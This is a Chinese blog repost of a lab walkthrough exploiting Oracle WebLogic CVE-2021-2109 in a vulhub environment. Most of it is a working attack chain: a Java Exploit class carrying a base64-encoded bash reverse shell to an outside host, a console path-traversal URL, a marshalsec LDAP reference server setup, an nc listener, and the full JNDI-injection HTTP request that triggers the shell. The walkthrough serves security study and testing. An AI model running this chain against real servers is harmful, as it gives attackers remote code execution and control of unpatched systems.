weblogic-CVE-2021-2109漏洞分析

admin

101091
文章

87
评论

2021年4月24日02:56:05评论87 views字数 2013阅读6分42秒阅读模式

在vulhub里找一个weblogic靶场进行搭建，本次实验使用的是14883靶场

启动后访问:

http://192.168.124.165:7001/console

weblogic-CVE-2021-2109漏洞分析

然后访问一下漏洞点：

http://192.168.124.165:7001/console/css/%252e%252e%252f/consolejndi.portal

weblogic-CVE-2021-2109漏洞分析

漏洞利用

1、首先编译一个恶意java文件，需要进行base64编码

import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader; public class Exploit{  public Exploit() throws Exception {      //Process p =Runtime.getRuntime().exec(newString[]{"cmd","/c","calc.exe"});    Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNC4xMjgvNjY2NiAwPiYx|base64-d |bash"});      InputStream is = p.getInputStream();      BufferedReader reader = new BufferedReader(new InputStreamReader(is));       String line;      while((line = reader.readLine()) != null) {          System.out.println(line);      }       p.waitFor();      is.close();      reader.close();      p.destroy();    }   public static void main(String[] args) throws Exception {    }}

把java程序进行编译，命令为：

Javac Exploit.java

会生成一个Exploit.class文件，讲这个文件放入web服务器中，确保让ladp能够调用到

这里使用python开启：

python -m SimpleHTTPServer 8000

访问一下看看是否正常工作

weblogic-CVE-2021-2109漏洞分析

2、使用marshalsec启动一个ladp服务器。

下载地址：https://github.com/mbechler/marshalsec

下载后切换到marshalsec目录下使用maven进行打包。

mvn clean package -DskipTests

weblogic-CVE-2021-2109漏洞分析

然后启动ldap服务：

java -cp marshalsec-0.0.3-SNAPSHOT-all.jarmarshalsec.jndi.LDAPRefServer http://192.168.124.133:8000/#Exploit 9000

weblogic-CVE-2021-2109漏洞分析

3、开启nc监听：

nc -lvvp 6666

weblogic-CVE-2021-2109漏洞分析

4、发送exp成功反弹shell

Exp（注意ip的192.168.124;133是为分号）：

GET /console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.124;133:9000/a12345;AdminServer%22) HTTP/1.1Host: 192.168.124.165:7001Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0;WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie:ADMINCONSOLESESSION=KC0jqfXzn_Dy5s6jg9QVT79hzzFgEptBFkxDUQE_SJYogGpGLfPn!-1632926475Connection: close

weblogic-CVE-2021-2109漏洞分析

本文始发于微信公众号（Khan安全团队）：weblogic-CVE-2021-2109漏洞分析

左青龙
微信扫一扫

右白虎
微信扫一扫

weblogic-CVE-2021-2109漏洞分析

引入弹性架构，到底是为什么？

一个IP Getshell

渗透测试实战分享

如何将DOM XSS升级为一键帐户接管（上集）

2024年网络威胁概览（05）| 供应链安全：漏洞的连锁反应

xx集团存在弱口令、sql注入、内网突破

TP-Link AC1750 漏洞挖掘的文章（2022）- Pwn2Own 2021

某众测前端解密学习记录

MS17-010永恒之蓝绕过数字上线

知识科普 | 信息安全-网络安全-数据安全

发表评论

在线咨询

微信